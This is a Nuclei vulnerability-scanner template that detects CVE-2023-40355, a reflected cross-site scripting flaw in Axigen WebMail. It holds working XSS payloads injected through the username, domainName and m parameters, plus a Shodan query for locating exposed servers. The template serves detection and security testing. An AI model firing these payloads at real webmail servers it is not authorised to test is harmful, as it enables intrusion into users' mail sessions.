nuclei-templates/http/cves/2023/CVE-2023-40355.yaml

48 lines
1.8 KiB
YAML

id: CVE-2023-40355
info:
name: Axigen WebMail - Cross-Site Scripting
author: amir-h-fallahi
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
reference:
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2023-40355
cwe-id: CWE-79
epss-score: 0.0006
epss-percentile: 0.22931
metadata:
max-request: 3
verified: true
shodan-query: http.favicon.hash:-1247684400
tags: cve,cve2023,xss,axigen,webmail
http:
- method: GET
path:
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\\\\'-alert(document.domain),//"
- "',alert(document.domain),'"
condition: or
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950